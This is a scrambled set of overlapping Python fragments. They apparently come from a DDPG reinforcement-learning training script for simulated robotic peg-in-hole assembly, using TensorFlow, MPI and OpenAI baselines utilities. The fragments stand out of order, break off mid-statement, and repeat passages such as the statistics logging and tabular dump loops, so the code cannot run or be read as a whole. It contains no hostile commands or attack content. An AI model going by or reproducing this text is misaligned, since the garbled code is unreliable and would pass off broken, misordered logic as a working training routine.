== 0: # saver = tf.train.Saver() # else: # saver = None", "nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train", "for key in sorted(combined_stats.keys()): logger.record_tabular(key, 
combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank", "str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if memory.nb_entries >=", "baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI import numpy", "= mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory", "header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key,", "combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] =", "= new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\" if", "param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None:", "Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*-", "import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf", "time from collections import deque import pickle import sys from baselines import logger", "mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward),", "sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess)", "= [] 
epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes =", "key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank ==", "combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess,", "'/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size,", "eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if", "- Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None: #", "for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward)", "for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl)", "nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action,", "epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats =", "if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time", "the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for", "with the 
following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only", "= mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') #", "actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment", "memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma", "forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps):", "done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action,", "expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The", "mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from", "tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() #", "agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the", "deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al", "t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert", "compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history))", "total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) 
combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] =", "for the exceed force!!!') # exit() break \"\"\"Episode failed and start pull the", "as tf from mpi4py import MPI import numpy as np import pandas as", "agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration =", "# saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session()", "None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses),", "nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2,", "= [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments =", "failed for the exceed force!!!') # pull_done = False # while pull_done is", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and", "# pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env", "pull_safe = env.pull_up() # True env # # if pull_safe is False: #", "forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0", "and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1)", "gamma, clip_norm, nb_train_steps, nb_rollout_steps, 
nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank =", "agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!')", "env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs", "the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes']", "# re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\",", "normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent", "= mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses)", "tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" # if rank", "= [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr =", "[] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments = []", "File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity:", "utf-8 -*- import os import time from collections import deque import pickle import", "= - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20", 
"forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1", "re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',',", "for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save", "= mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the", "env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\"", "as U import tensorflow as tf from mpi4py import MPI import numpy as", "normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,", "combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and", "# env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs =", "= pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir", "[] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = []", "logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\"", "np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in", "import 
tensorflow as tf from mpi4py import MPI import numpy as np import", "epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout +", "in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total", "if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 #", "necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise()", "False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward", "\"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 # t", "not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r +", "\"\"\"Episode failed and start pull the pegs step by step\"\"\" if info is", "q_value = 0. done = False forcement = [] Last_average_reward = 0. 
Number_episodes", "the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for", "if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f: pickle.dump(eval_env.get_state(), f)", "action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the", "if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout", "-*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12", "== 0: # saver = tf.train.Saver() # else: # saver = None #", "pull_done, pull_safe = env.pull_up() # True env # # if pull_safe is False:", "= np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps =", "= [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions =", "following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a", "0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if", "actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items()))", ": <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding:", "sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', 
header=False, index=False) #", "= 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs,", "Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12", "= mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] =", "'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False)", "sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir()", "deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory +", "param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following", "memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write", "else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with", "new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\" if done:", "combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) 
combined_stats['rollout/actions_mean']", "the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',',", "'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments)", "cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\"", "= env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull up", ": Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" #", "import numpy as np import pandas as pd \"\"\"First the path should be", "model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr =", "utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date:", "= [] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for", "# True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed", "Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 # t =", "is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break", "popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank", "== 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1)", "sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()):", "Description : Author : <NAME> date: 18-1-12 
------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\"", "range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses", "the exceed force!!!') # pull_done = False # while pull_done is False and", "param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps,", "pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval,", "normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using", "header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps", "in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. 
episode_discount_reward", "is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\"", "# min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {}", "\"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout)", "/ nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances =", "epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration", "result for cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses", "= 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False:", "and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward", "# else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100)", "#True env # # if pull_safe is False: # logger.info('Pull up the pegs", "-0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory =", "should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor,", "pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env #", "open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with", "from util import mpi_mean, mpi_std, mpi_max, mpi_sum import 
baselines.common.tf_util as U import tensorflow", "[] epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes = 0", "epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward", "is False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe =", "[] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr", "mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor']", "= pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement',", "action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value +=", "coding: utf-8 -*- import os import time from collections import deque import pickle", "== 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:", "= [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward =", "info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up()", "the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps),", "clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver()", 
"before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim,", "q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale", "cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch ==", "env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle ==", "times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net()", "mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions)", "+= 1 # pull_done = False # while pull_done is False and info:", "mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats", "if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb')", "== nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs,", "in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise,", "clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = 
MPI.COMM_WORLD.Get_rank()", "+ gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) #", "eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2,", "summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes)", "in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma", "\"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement)", "action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q", "= mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances)", "/ delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset", "False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards", "True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for", "= np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2,", "assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\"", "max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2,", "pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with 
open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:", "+= q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action =", "= [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict", "# pull_done, pull_safe = env.pull_up() # True env # # if pull_safe is", "epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while", "epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed", "and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch", "distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes)", "MPI import numpy as np import pandas as pd \"\"\"First the path should", "critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps,", "saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as", "start pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly", "in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0", "env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull up the", "render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm,", "0. 
for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True,", "env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau,", "pull_safe is False: # logger.info('Pull up the pegs failed for the exceed force!!!')", "\"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr /", "up logging stuff only for a single worker\"\"\" # if rank == 0:", "exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if", "compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\"", "\"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else:", "0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if", "0. q_value = 0. done = False forcement = [] Last_average_reward = 0.", "reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. 
